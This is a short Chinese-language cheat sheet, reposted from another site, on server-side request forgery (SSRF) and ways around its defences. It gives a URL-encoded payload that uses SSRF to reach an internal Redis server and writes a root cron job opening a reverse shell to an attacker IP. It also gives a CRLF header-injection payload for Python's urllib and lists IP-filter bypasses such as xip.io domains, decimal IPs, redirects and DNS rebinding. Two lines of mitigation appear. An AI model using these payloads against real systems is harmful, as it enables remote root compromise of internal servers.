ssrf原理和绕过姿势

转自paper.tuisec.win/detail-f2b26ca1c3d5b53.html

通过ssrf利用内网中的redis服务器，构造脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/ip/port" 0>&1 \n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

进行url编码：test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

ssrf in python

python http头注入漏洞，当使用了urllib库时，请求url为用户可控时，可能出现ssrf

./test.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

修复方案：限制协议为http，https

限制302重定向、设置url白名单或限制内网ip

绕过技巧：

添加端口号

指向任意ip的域名xip.io

10.0.0.1.xip.io  resolves to  10.0.0.1

www.10.0.0.1.xip.ioresolves to   10.0.0.1

mysite.10.0.0.1.xip.io   resolves to   10.0.0.1

foo.bar.10.0.0.1.xip.io   resolves to   10.0.0.1

ip限制绕过：转十进制、构造302跳转服务、DNS rebinding